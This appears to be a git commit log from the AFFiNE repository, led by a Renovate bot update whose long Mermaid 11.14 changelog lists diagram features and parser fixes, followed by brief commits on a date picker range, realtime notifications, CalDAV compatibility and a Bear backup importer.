Thanks [@&#8203;dull-bird](https://redirect.github.com/dull-bird)! -
fix(quadrant-chart): allow CJK, emoji, Latin-1 accented characters, and
other non-ASCII text in unquoted axis/quadrant/point labels.

Previously the lexer only matched ASCII `[A-Za-z]+` for text tokens,
even though the grammar referenced `UNICODE_TEXT`. Bare Chinese,
Japanese, Korean, emoji, and accented Latin characters in labels caused
a parse error. Added a `[^\x00-\x7F]+` lexer rule to emit `UNICODE_TEXT`
and included it in the `alphaNumToken` grammar rule.

Fixes
[#&#8203;7120](https://redirect.github.com/mermaid-js/mermaid/issues/7120).

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`4755553`](https://redirect.github.com/mermaid-js/mermaid/commit/4755553d5fb6d1217809e43ffb8fc54d6a73e482)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: improve D3 types for mermaidAPI funcs

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`6476973`](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: handle `&` when namespacing CSS rules

-
[#&#8203;7520](https://redirect.github.com/mermaid-js/mermaid/pull/7520)
[`8c1a0c1`](https://redirect.github.com/mermaid-js/mermaid/commit/8c1a0c1fd19587c6772d6966fe9d217e5cd1356c)
Thanks
[@&#8203;RodrigojndSantos](https://redirect.github.com/RodrigojndSantos)!
- fix(stateDiagram): comments starting with one `%` are no longer
treated as comments

  Switch to using two `%%` if you want to write a comment.

- Updated dependencies
\[[`7a8fb85`](https://redirect.github.com/mermaid-js/mermaid/commit/7a8fb8532c57ecc55b3711454ab0e505a4291445),
[`675a64c`](https://redirect.github.com/mermaid-js/mermaid/commit/675a64ca0e3cde8728ca715991623c3fc055ce88)]:
-
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.1

###
[`v11.14.0`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.14.0)

[Compare
Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.13.0...mermaid@11.14.0)

Thanks to our awesome mermaid community that contributed to this
release:
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512),
[@&#8203;tractorjuice](https://redirect.github.com/tractorjuice),
[@&#8203;autofix-ci\[bot\]](https://redirect.github.com/autofix-ci%5Bbot%5D),
[@&#8203;aloisklink](https://redirect.github.com/aloisklink),
[@&#8203;knsv](https://redirect.github.com/knsv),
[@&#8203;kibanana](https://redirect.github.com/kibanana),
[@&#8203;chandershekhar22](https://redirect.github.com/chandershekhar22),
[@&#8203;khalil](https://redirect.github.com/khalil),
[@&#8203;ytatsuno](https://redirect.github.com/ytatsuno),
[@&#8203;sidharthv96](https://redirect.github.com/sidharthv96),
[@&#8203;github-actions\[bot\]](https://redirect.github.com/github-actions%5Bbot%5D),
[@&#8203;dripcoding](https://redirect.github.com/dripcoding),
[@&#8203;knsv-bot](https://redirect.github.com/knsv-bot),
[@&#8203;jeroensmink98](https://redirect.github.com/jeroensmink98),
[@&#8203;Alex9583](https://redirect.github.com/Alex9583),
[@&#8203;GhassenS](https://redirect.github.com/GhassenS),
[@&#8203;omkarht](https://redirect.github.com/omkarht),
[@&#8203;darshanr0107](https://redirect.github.com/darshanr0107),
[@&#8203;leentaylor](https://redirect.github.com/leentaylor),
[@&#8203;lee-treehouse](https://redirect.github.com/lee-treehouse),
[@&#8203;veeceey](https://redirect.github.com/veeceey),
[@&#8203;turntrout](https://redirect.github.com/turntrout),
[@&#8203;Mermaid-Chart](https://redirect.github.com/Mermaid-Chart),
[@&#8203;BambioGaming](https://redirect.github.com/BambioGaming), Claude

### Releases

####
[@&#8203;mermaid-js/examples](https://redirect.github.com/mermaid-js/examples)@&#8203;1.2.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

#### mermaid\@&#8203;11.14.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Add Wardley Maps diagram type (beta)

Adds Wardley Maps as a new diagram type to Mermaid (available as
`wardley-beta`). Wardley Maps are visual representations of business
strategy that help map value chains and component evolution.

  Features:

- Component positioning with \[visibility, evolution] coordinates (OWM
format)
  - Anchors for users/customers
  - Multiple link types: dependencies, flows, labeled links
  - Evolution arrows and trend indicators
  - Custom evolution stages with optional dual labels
- Custom stage widths using
[@&#8203;boundary](https://redirect.github.com/boundary) notation
  - Pipeline components with visibility inheritance
  - Annotations, notes, and visual elements
  - Source strategy markers: build, buy, outsource, market
  - Inertia indicators
  - Theme integration

Implementation includes parser, D3.js renderer, unit tests, E2E tests,
and comprehensive documentation.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for state diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for sequence diagrams with drop
shadows, and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add `randomize` config option for architecture diagrams,
defaulting to `false` for deterministic layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: Add option to change timeline direction

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Fix duplicate SVG element IDs when rendering multiple diagrams on the
same page. Internal element IDs (nodes, edges, markers, clusters) are
now prefixed with the diagram's SVG element ID across all diagram types.
Custom CSS or JS using exact ID selectors like `#arrowhead` should use
attribute-ending selectors like `[id$="-arrowhead"]` instead.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for ER diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for requirement diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add theme support for data label colour in xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for mindmap diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look for mermaid flowchart diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for class diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add showDataLabelOutsideBar option for xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for timeline diagram with drop
shadows, additoinal redux themes and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for gitGraph diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

##### Patch Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add link to ishikawa diagram on mermaid.js.org

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- docs: document valid duration token formats in gantt.md

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: ER diagram parsing when using "1" as entity identifier on right
side

The parser was incorrectly tokenizing the second "1" in patterns like `a
many to 1 1:` because the lookahead rule only checked for alphabetic
characters after whitespace, not digits. Added a new lookahead pattern
`"1"(?=\s+[0-9])` to correctly identify the cardinality alias before a
numeric entity name.

Fixes
[#&#8203;7472](https://redirect.github.com/mermaid-js/mermaid/issues/7472)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: scope cytoscape label style mapping to edges with labels to
prevent console warnings

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: support inline annotation syntax in class diagrams (class Shape
<<interface>>)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Align branch label background with text for multi-line labels in
LR GitGraph layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: preserve cause hierarchy when ishikawa effect is indented more
than causes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- refactor: remove unused createGraphWithElements function and add
regression test for open edge arrowheads

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Prevent long pie chart titles from being clipped by expanding the
viewBox

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: prevent sequence diagram hang when "as" is used without a
trailing space in participant declarations

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: warn when `style` statement targets a non-existent node in
flowcharts

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: group state diagram SVG children under single root <g> element

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Allow :::className syntax inside composite state blocks

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink),
[@&#8203;BambioGaming](https://redirect.github.com/BambioGaming)! - fix:
prevent escaping `<` and `&` when `htmlLabels: false`

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: treemap title and labels use theme-aware colors for dark
backgrounds

- Updated dependencies
\[[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)]:
-
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

####
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

####
[@&#8203;mermaid-js/tiny](https://redirect.github.com/mermaid-js/tiny)@&#8203;11.14.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Add Wardley Maps diagram type (beta)

Adds Wardley Maps as a new diagram type to Mermaid (available as
`wardley-beta`). Wardley Maps are visual representations of business
strategy that help map value chains and component evolution.

  Features:

- Component positioning with \[visibility, evolution] coordinates (OWM
format)
  - Anchors for users/customers
  - Multiple link types: dependencies, flows, labeled links
  - Evolution arrows and trend indicators
  - Custom evolution stages with optional dual labels
- Custom stage widths using
[@&#8203;boundary](https://redirect.github.com/boundary) notation
  - Pipeline components with visibility inheritance
  - Annotations, notes, and visual elements
  - Source strategy markers: build, buy, outsource, market
  - Inertia indicators
  - Theme integration

Implementation includes parser, D3.js renderer, unit tests, E2E tests,
and comprehensive documentation.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for state diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for sequence diagrams with drop
shadows, and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add `randomize` config option for architecture diagrams,
defaulting to `false` for deterministic layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: Add option to change timeline direction

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Fix duplicate SVG element IDs when rendering multiple diagrams on the
same page. Internal element IDs (nodes, edges, markers, clusters) are
now prefixed with the diagram's SVG element ID across all diagram types.
Custom CSS or JS using exact ID selectors like `#arrowhead` should use
attribute-ending selectors like `[id$="-arrowhead"]` instead.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for ER diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for requirement diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add theme support for data label colour in xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for mindmap diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look for mermaid flowchart diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for class diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add showDataLabelOutsideBar option for xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for timeline diagram with drop
shadows, additoinal redux themes and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for gitGraph diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

##### Patch Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add link to ishikawa diagram on mermaid.js.org

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- docs: document valid duration token formats in gantt.md

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: ER diagram parsing when using "1" as entity identifier on right
side

The parser was incorrectly tokenizing the second "1" in patterns like `a
many to 1 1:` because the lookahead rule only checked for alphabetic
characters after whitespace, not digits. Added a new lookahead pattern
`"1"(?=\s+[0-9])` to correctly identify the cardinality alias before a
numeric entity name.

Fixes
[#&#8203;7472](https://redirect.github.com/mermaid-js/mermaid/issues/7472)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: scope cytoscape label style mapping to edges with labels to
prevent console warnings

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: support inline annotation syntax in class diagrams (class Shape
<<interface>>)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Align branch label background with text for multi-line labels in
LR GitGraph layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: preserve cause hierarchy when ishikawa effect is indented more
than causes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- refactor: remove unused createGraphWithElements function and add
regression test for open edge arrowheads

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Prevent long pie chart titles from being clipped by expanding the
viewBox

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: prevent sequence diagram hang when "as" is used without a
trailing space in participant declarations

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: warn when `style` statement targets a non-existent node in
flowcharts

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: group state diagram SVG children under single root <g> element

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Allow :::className syntax inside composite state blocks

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink),
[@&#8203;BambioGaming](https://redirect.github.com/BambioGaming)! - fix:
prevent escaping `<` and `&` when `htmlLabels: false`

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: treemap title and labels use theme-aware colors for dark
backgrounds

- Updated dependencies
\[[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)]:
-
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 16:20:41 +08:00
Abdul Rehman 76d57aa389 feat(editor): allow date picker to navigate back to year 1000 (#14942)
Fixes #14935

## Summary

The date picker had a hardcoded `_minYear = 1970` in
[`date-picker.ts`](blocksuite/affine/components/src/date-picker/date-picker.ts),
which prevented users from selecting dates earlier than 1970. This
blocked legitimate use cases like historical and genealogical research
(see the reporter's comment on #14935).

## Fix

Lower the date picker's `_minYear` from `1970` to `1000`. The underlying
storage is just a `zod.number()` (Unix timestamp in ms), which supports
negative values, so no data-layer or backend changes are required — this
is a UI-only constraint relaxation.

## Demo

<img width="2044" height="1250" alt="image"
src="https://github.com/user-attachments/assets/4b25b333-89c4-48e6-9f91-81781d680200"
/>

## Test plan

- [x] Insert a database in a doc → add a Date column
- [x] Click a date cell → open the picker → click the year label →
navigate back through decades
- [x] Confirm the calendar reaches years well before 1970 (verified at
May 1805)
- [x] Confirm the calendar correctly renders weekdays for historical
dates
- [x] Confirm picking a modern date still works as before

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Date picker now allows selecting dates from year 1000 onward,
expanding historical date coverage.

* **Bug Fixes**
* Navigation (month switches and keyboard arrows) now keeps the
selection cursor within the allowed year range, preventing out-of-range
jumps.

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14942)
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-12 15:47:36 +08:00
DarkSky db0ff0a9df feat(core): migrate more pull to realtime (#14936)
#### PR Dependency Tree


* **PR #14936** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
* Consolidated realtime subscription patterns for consistent, more
reliable live updates across comments, notifications, transcription
tasks, and embedding progress.
* Standardized realtime room naming and subscription keys for
deterministic delivery.

* **New Features**
* Introduced a reusable live-query mechanism powering realtime snapshot
+ event workflows used by comments, notifications, transcript tasks, and
embedding progress.

* **Tests**
* Added tests covering live-query behavior and deterministic
subscription key generation.

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14936)
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-11 00:33:25 +08:00
DarkSky 8cf00738c2 feat(server): realtime notification & task status (#14934)
#### PR Dependency Tree


* **PR #14934** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Full realtime platform added: live notifications, comments, embedding
progress, and transcription task updates via realtime subscriptions.

* **Chores**
* Frontend switched from polling/GraphQL queries to realtime channels;
legacy query fields marked deprecated and client libs updated to use
realtime APIs.

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14934)
<!-- end of auto-generated comment: release notes by coderabbit.ai -->


#### PR Dependency Tree


* **PR #14934** 👈
  * **PR #14936**

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-05-10 23:21:50 +08:00
DarkSky 417d31cabe fix(core): ui state (#14933)
#### PR Dependency Tree


* **PR #14933** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
  * Added draft tab option to AI chat interface
* Introduced "Current document" session history view in chat history
popover
  * Added control to show/hide "New Chat" button

* **Improvements**
  * Enhanced chat history preservation when switching between sessions
  * Prevented duplicate session creation requests
  * Improved message handling during session transitions and generation

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14933)

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-09 23:33:37 +08:00
DarkSky fcc45a3f44 fix(server): caldav compatibility (#14930)
fix #14411
fix #14909 

Some CalDAV servers do not implement standard responses; add
compatibility for these servers.


#### PR Dependency Tree


* **PR #14930** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved CalDAV discovery error handling to gracefully fall back when
the server returns certain error statuses.

* **New Features**
* CalDAV account linking now returns the number of discovered calendars
associated with the account.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-09 02:40:47 +08:00
DarkSky bcbde16c04 feat(server): native safe fetch (#14931) 2026-05-09 02:40:25 +08:00
DarkSky 32a94d68dc chore: add utils 2026-05-09 02:32:10 +08:00
DarkSky 5813e7dd77 chore: update i18n 2026-05-07 11:32:55 +08:00
karl-kaefer ac37d07e74 feat(editor): add Bear backup import and markdown zip folder hierarchy (#14599)
## Summary

- Add Bear `.bear2bk` backup importer (TextBundle-based zip format)
- Enhance markdown zip import to preserve folder structure from zip
paths
- Add colored highlight (`<mark data-color="...">`) support to HTML
adapter

### Bear Import Details

